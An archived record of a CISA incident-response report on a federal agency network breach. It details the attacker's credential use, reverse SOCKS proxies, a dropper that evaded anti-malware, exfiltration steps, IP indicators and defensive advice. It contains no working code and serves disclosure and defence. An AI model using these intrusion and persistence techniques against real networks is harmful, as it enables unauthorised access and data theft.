{
	"id": "d9f8aba5-d19e-4453-a0a4-aba759f7d0d5",
	"created_at": "2026-04-06T00:14:50.0722Z",
	"updated_at": "2026-04-10T03:20:03.310272Z",
	"deleted_at": null,
	"sha1_hash": "eab346f2ae14b7bc367b22d2b6bdab6d50f4d925",
	"title": "Federal Agency Compromised by Malicious Cyber Actor | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 126421,
	"plain_text": "Federal Agency Compromised by Malicious Cyber Actor | CISA\r\nPublished: 2020-10-24 · Archived: 2026-04-05 13:37:30 UTC\r\nCISA became aware—via EINSTEIN, CISA’s intrusion detection system that monitors federal civilian networks\r\n—of a potential compromise of a federal agency’s network. In coordination with the affected agency, CISA\r\nconducted an incident response engagement, confirming malicious activity. The following information is derived\r\nexclusively from the incident response engagement and provides the threat actor’s tactics, techniques, and\r\nprocedures as well as indicators of compromise that CISA observed as part of the engagement.\r\nThreat Actor Activity\r\nThe cyber threat actor had valid access credentials for multiple users’ Microsoft Office 365 (O365) accounts and\r\ndomain administrator accounts, which they leveraged for Initial Access [TA0001 ] to the agency's network\r\n(Valid Accounts [T1078 ]). First the threat actor logged into a user’s O365 account from Internet Protocol (IP)\r\naddress 91.219.236[.]166 and then browsed pages on a SharePoint site and downloaded a file (Data from\r\nInformation Repositories: SharePoint [T1213.002 ]). The cyber threat actor connected multiple times by\r\nTransmission Control Protocol (TCP) from IP address 185.86.151[.]223 to the victim organization’s virtual\r\nprivate network (VPN) server (Exploit Public-Facing Application [T1190 ]).\r\nCISA analysts were not able to determine how the cyber threat actor initially obtained the credentials. It is\r\npossible the cyber actor obtained the credentials from an unpatched agency VPN server by exploiting a known\r\nvulnerability—CVE-2019-11510—in Pulse Secure (Exploitation for Credential Access [T1212 ]). In April 2019,\r\nPulse Secure released patches for several critical vulnerabilities—including CVE-2019-11510, which allows the\r\nremote, unauthenticated retrieval of files, including passwords.[1 ] CISA has observed wide exploitation of\r\nCVE-2019-11510 across the federal government.[2]\r\nAfter initial access, the threat actor performed Discovery [TA0007 ] by logging into an agency O365 email\r\naccount from 91.219.236[.]166 and viewing and downloading help desk email attachments with “Intranet\r\naccess” and “VPN passwords” in the subject line, despite already having privileged access (Email Collection\r\n[T1114 ], Unsecured Credentials: Credentials In Files [T1552.001 ]). (Note: these emails did not contain any\r\npasswords.) The actor logged into the same email account via Remote Desktop Protocol (RDP) from IP address\r\n207.220.1[.]3 (External Remote Services [T1133 ]). The actor enumerated the Active Directory and Group\r\nPolicy key and changed a registry key for the Group Policy (Account Manipulation [T1098 ]). Immediately\r\nafterward, the threat actor used common Microsoft Windows command line processes— conhost , ipconfig ,\r\nnet , query , netstat , ping , and whoami , plink.exe —to enumerate the compromised system and\r\nnetwork (Command and Scripting Interpreter [T1059 ], System Network Configuration Discovery [T1016 ]).\r\nThe cyber threat actor then attempted multiple times to connect to virtual private server (VPS) IP\r\n185.86.151[.]223 through a Windows Server Message Block (SMB) client. Although they connected and\r\ndisconnected multiple times, the connections were ultimately successful. During the same period, the actor used\r\nan alias secure identifier account they had previously created to log into VPS 185.86.151[.]223 via an SMB\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a\r\nPage 1 of 6\n\nshare. The attacker then executed plink.exe on a victim file server (Command and Scripting Interpreter [T1059\r\n]). ( plink.exe is a command-line version of PuTTy that is used for remote administration.)\r\nThe cyber threat actor established Persistence [TA0003 ] and Command and Control [TA0011 ] on the victim\r\nnetwork by (1) creating a persistent Secure Socket Shell (SSH) tunnel/reverse SOCKS proxy, (2) running\r\ninetinfo.exe (a unique, multi-stage malware used to drop files), and (3) setting up a locally mounted remote\r\nshare on IP address 78.27.70[.]237 (Proxy [T1090 ]). The mounted file share allowed the actor to freely move\r\nduring its operations while leaving fewer artifacts for forensic analysis. Refer to Threat Actor Malware section for\r\nmore information about the SSH Tunnel/reverse SOCKS proxy and inetinfo.exe .\r\nThe cyber threat actor created a local account, which they used for data Collection [TA0009 ], Exfiltration\r\n[TA0010 ], Persistence [TA0003 ], and Command and Control [TA0011 ] (Create Account [T1136 ]). The\r\ncyber threat actor used the local account to:\r\nBrowse directories on a victim file server (Data from Shared Network Drive [T1039 ]).\r\nCopy a file from a user’s home directory to their locally mounted remote share (Data Staged [T1074 ]).\r\nCISA analysts detected the cyber threat actor interacting with other files on users’ home directories\r\nbut could not confirm whether they were exfiltrated.\r\nCreate a reverse SMB SOCKS proxy that allowed connection between an cyber threat actor-controlled\r\nVPS and the victim organization’s file server (refer to Threat Actor Malware section for more information)\r\n(Proxy [T1090 ]).\r\nInteract with PowerShell module Invoke-TmpDavFS.psm (refer to Threat Actor Malware section for more\r\ninformation).\r\nExfiltrate data from an account directory and file server directory using tsclient ( tsclient is a\r\nMicrosoft Windows Terminal Services client) (Data from Local System [T1005 ], Data from Network\r\nShared Drive [T1039 ]).\r\nCreate two compressed Zip files with several files and directories on them (Archive Collected Data [T1560\r\n]); it is likely that the cyber threat actor exfiltrated these Zip files, but this cannot be confirmed because\r\nthe actor masked their activity.\r\nSee figure 1 for the sequence of the cyber threat actor’s tactics and techniques.\r\nFigure 1: Cyber threat actor tactics and techniques\r\nThreat Actor Malware\r\nPersistent SSH Tunnel/Reverse SOCKS Proxy\r\nWhile logged in as “Administrator,” the cyber threat actor created two Scheduled Tasks (see table 1) that worked\r\nin concert to establish a persistent SSH tunnel and reverse SOCKS proxy. The proxy allowed connections between\r\nan attacker-controlled remote server and one of the victim organization’s file servers (Scheduled Task/Job [T1053\r\n], Proxy [T1090 ]). The Reverse SOCKS Proxy communicated through port 8100 (Non-Standard Port [T1571\r\n]). This port is normally closed, but the attacker’s malware opened it.\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a\r\nPage 2 of 6\n\nTable 1: Scheduled Tasks composing SSH tunnel and reverse SOCKS proxy\r\nScheduled Task Description\r\nShellExperienceHost.exe\r\nThis task created a persistent SSH tunnel to attacker-controlled remote server\r\n206.189.18[.]189 and employed port forwarding to allow connections from\r\nthe remote server port 39999 to the victim file server through port 8100. This\r\ntask was run daily.\r\nShellExperienceHost.exe is a version of plink.exe , a command-line\r\nversion of PuTTy that is used for remote administration.\r\nWinDiag.exe\r\nThis task is a reverse SOCKS proxy that is preconfigured to bind to and listen\r\non TCP port 8100. WinDiag.exe received responses through the SSH tunnel\r\nand forwarded the responses through port 8100 to the VPS IP address\r\n185.193.127[.]17 over port 443. This task was run on boot.\r\nWinDiag.exe had compile information that matched the VPS login name\r\nDropper Malware: inetinfo.exe\r\nThe threat actor created a Scheduled Task to run inetinfo.exe (Scheduled Task/Job [T1053 ]). inetinfo.exe is\r\na unique, multi-stage malware used to drop files (figure 2). It dropped system.dll and 363691858 files and a\r\nsecond instance of inetinfo.exe . The system.dll from the second instance of inetinfo.exe decrypted\r\n363691858 as binary from the first instance of inetinfo.exe . The decrypted 363691858 binary was injected\r\ninto the second instance of inetinfo.exe to create and connect to a locally named tunnel. The injected binary\r\nthen executed shellcode in memory that connected to IP address 185.142.236[.]198 , which resulted in download\r\nand execution of a payload.\r\nFigure 2: Dropper malware inetinfo.exe\r\nThe cyber threat actor was able to overcome the agency’s anti-malware protection, and inetinfo.exe escaped\r\nquarantine. CISA analysts determined that the cyber threat actor accessed the anti-malware product’s software\r\nlicense key and installation guide and then visited a directory used by the product for temporary file analysis.\r\nAfter accessing this directory, the cyber threat actor was able to run inetinfo.exe (Impair Defenses: Disable or\r\nModify Tools [T1562.001 ]).\r\nReverse SMB SOCKS Proxy\r\nPowerShell script HardwareEnumeration.ps1 created a reverse SMB SOCKS proxy that allowed connection\r\nbetween attacker-controlled VPS IP 185.193.127[.]18 and the victim organization’s file server over port 443\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a\r\nPage 3 of 6\n\n(Command and Scripting Interpreter: Power Shell [T1059.001 ], Proxy [T1090 ]). PowerShell script\r\nHardwareEnumeration.ps1 was executed daily via a Scheduled Task (Scheduled Task/Job [T1053 ]).\r\nHardwareEnumeration.ps1 is a copy of Invoke-SocksProxy.ps1 , a free tool created and distributed by a security\r\nresearcher on GitHub.[3 ] Invoke-SocksProxy.ps1 creates a reverse proxy from the local machine to attacker\r\ninfrastructure through SMB TCP port 445 (Non-Standard Port [T1571 ]). The script was likely altered with the\r\ncyber threat actor’s configuration needs.\r\nPowerShell Module: invoke-TmpDavFS.psm\r\ninvoke-TmpDavFS.psm is a PowerShell module that creates a Web Distributed Authoring and Versioning\r\n(WebDAV) server that can be mounted as a file system and communicates over TCP port 443 and TCP port 80.\r\ninvoke-TmpDavFS.psm is distributed on GitHub.[4 ]\r\nSummary\r\nThis Analysis Report uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT\u0026CK®)\r\nframework. See the ATT\u0026CK for Enterprise framework for all referenced threat actor tactics and techniques.\r\nThe Cybersecurity and Infrastructure Security Agency (CISA) responded to a recent threat actor’s cyberattack on\r\na federal agency’s enterprise network. By leveraging compromised credentials, the cyber threat actor implanted\r\nsophisticated malware—including multi-stage malware that evaded the affected agency’s anti-malware protection\r\n—and gained persistent access through two reverse Socket Secure (SOCKS) proxies that exploited weaknesses in\r\nthe agency’s firewall.\r\nFor a downloadable copy of IOCs, see: AA20-268A.stix.\r\nSolution\r\nIndicators of Compromise\r\nCISA analysts identified several IP addresses involved in the multiple stages of the outlined attack.\r\n185.86.151[.]223 – Command and Control (C2)\r\n91.219.236[.]166 – C2\r\n207.220.1[.]3 – C2\r\n78.27.70[.]237 – Data Exfiltration\r\n185.193.127[.]18 – Persistence\r\nMonitor Network Traffic for Unusual Activity\r\nCISA recommends organizations monitor network traffic for the following unusual activity.\r\nUnusual open ports (e.g., port 8100)\r\nLarge outbound files\r\nUnexpected and unapproved protocols, especially outbound to the internet (e.g., SSH, SMB, RDP)\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a\r\nPage 4 of 6\n\nIf network defenders note any of the above activity, they should investigate.\r\nPrevention\r\nCISA recommends organizations implement the following recommendations to protect against activity identified\r\nin this report.\r\nDeploy an Enterprise Firewall\r\nOrganizations should deploy an enterprise firewall to control what is allowed in and out of their network.\r\nIf the organization chooses not to deploy an enterprise firewall, they should work with their internet service\r\nprovider to ensure the firewall is configured properly.\r\nBlock Unused Ports\r\nOrganizations should conduct a survey of the traffic in and out of their enterprise to determine the ports needed for\r\norganizational functions. They should then configure their firewall to block unnecessary ports. Organization\r\nshould develop a change control process to make control changes to those rules. Of special note, unused SMB,\r\nSSH, and FTP ports should be blocked.\r\nAdditional Recommendations\r\nCISA recommends organizations implement the following best practices.\r\nImplement multi-factor authentication, especially for privileged accounts.\r\nUse separate administrative accounts on separate administration workstations.\r\nImplement the principle of least privilege on data access.\r\nSecure RDP and other remote access solutions using multifactor authentication and “jump boxes” for\r\naccess.\r\nDeploy and maintain endpoint defense tools on all endpoints.\r\nKeep software up to date.\r\nReferences\r\n[1] Pulse Secure Security Advisory SA44101 Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse\r\nConnect Secure / Pulse Policy Secure 9.0RX\r\n[3] GitHub Repository for Invoke-SocksProxy\r\n[4] GitHub Repository for Invoke-TmpDavFS\r\nRevisions\r\nSeptember 24, 2020: Initial Version\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a\r\nPage 5 of 6\n\nSource: https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a"
	],
	"report_names": [
		"ar20-268a"
	],
	"threat_actors": [],
	"ts_created_at": 1775434490,
	"ts_updated_at": 1775791203,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/eab346f2ae14b7bc367b22d2b6bdab6d50f4d925.pdf",
		"text": "https://archive.orkl.eu/eab346f2ae14b7bc367b22d2b6bdab6d50f4d925.txt",
		"img": "https://archive.orkl.eu/eab346f2ae14b7bc367b22d2b6bdab6d50f4d925.jpg"
	}
}